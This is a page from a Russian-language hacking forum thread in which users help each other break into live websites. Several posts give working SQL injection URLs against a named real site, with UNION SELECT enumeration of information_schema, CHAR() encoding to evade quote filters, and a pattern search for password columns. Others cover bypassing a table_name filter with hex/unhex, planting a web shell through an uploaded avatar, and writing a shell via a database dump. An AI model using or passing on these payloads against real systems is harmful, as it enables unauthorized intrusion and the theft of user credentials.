Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    Т.е. имея возможность залить обратно Дамп БД , я не могу залить шел ?
     
  2. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    мое мнение - только если есть file_priv, у пользователя mysql.
    ну или в самой базе содержится Php код, и потом выполняется в eval ... (очень редко такое бывает)
     
  3. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+23,2/*
    Колонка форума с юзерами. но что дальше делать это я забыл ;( подскажите
     
  4. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Вообще то тебе дальше нужно узнать как называются столбики в найденой таблице, для этого нужно вывести поле column_name из таблицы information_schema.columns при этом указать where table_name='phpbb_acl_users' но если там кавычки фильруются то нужно закодировать допустим чаром вот так table_name=CHAR(112,104,112,98,98,95,97,99,108,95,117,115,101,114,115)
    Отсюда запрос будет таким
    http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_name,3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=CHAR(112,104,112,98,98,95,97,99,108,95,117,115,101,114,115)/*
    Потом лимитом перебираеш все столбики... НО... я глянул в это таблице вроде нету поле пароля...
    Я обычно для ускорения делаю так
    http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_name,3,4,5,6,7,8,table_name+from+information_schema.columns+where+column_name+LIKE+CHAR(37,112,97,115,37)+limit+0,1/*
    под чаром скрыто %pas% Это значит что я хочу вывести все столбики в которых есть сочетание 'pas' ;) Можно конечно нарватся и на pwd тогда этот запрос не пройдет, но обычно значительно ускоряет процес.
    Удачи!
     
    1 person likes this.
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    А разве скл инж тул не работает в данном случае ?Особенно в пятой версии)
     
  6. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Велемир
    о да.. еще как работает sql tool 3

    пс: у кого есть норм енкодер text в char()?
     
    #2186 sabe, 31 May 2008
    Last edited: 1 Jun 2008
  7. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    http://www.webfuture.ru/igo/convert.php
     
    1 person likes this.
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    спс)
     
  9. none222

    none222 Guest

    Reputations:
    0
    ситуация такая:

    Есть форум - вобла.
    там можно юзать авики. Но там как и на ачате, не видно где лежит авик. а такой адрес, типа _http://forum.antichat.ru/image.php?u=34303&dateline=1206845324

    мне нужно в авик вписать шелл.

    вопрос:
    как мне анйти путь к моему авику? Или в этом случае аваторы в БД?
     
  10. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    В булке аватары в бд если не ошибаюсь)
     
    _________________________
  11. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Есть скуля. Версия 5. База данных и юзера выдернул.
    Когда начинают вытаскивать наименования колонки, меня выкидывает на белую страницу ни без чего.
    Есть предположение, что фильтрует "table_name" - как этот фильтр обойти?
     
  12. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Ershik, hex(unhex(table_name)) попробуй.

    з.ы. Можно ещё с aes_encrypt поэксперементировать
     
  13. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Страница есть, но вывод информации пропал.
    Самое грустное, что там оключен вывод ошибок.
     
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ershik
    Может ссылку? Доступ к шеме есть?
     
    1 person likes this.
  15. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Закинул ссылку в личку. Определил, что ругается на table_name. Ничего больше не фильтрует.
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Посмотрел с лимитом пашет
     
    2 people like this.
  17. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Может всё-таки unhex(hex(value)) ? а то как-то нелогично..
     
    _________________________
  18. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    jokester, спасибо.

    +toxa+ запахало, но не видно вывода таблицы на "стандартном месте".

    Извиняюсь, забыл убрать пробел. Все работает.
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    :D Я даже не увидел,но сдесь пофигу, там нормальная кодировка
     
  20. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    +toxa+, оу, да)) ну опечатался..
     
Thread Status:
Not open for further replies.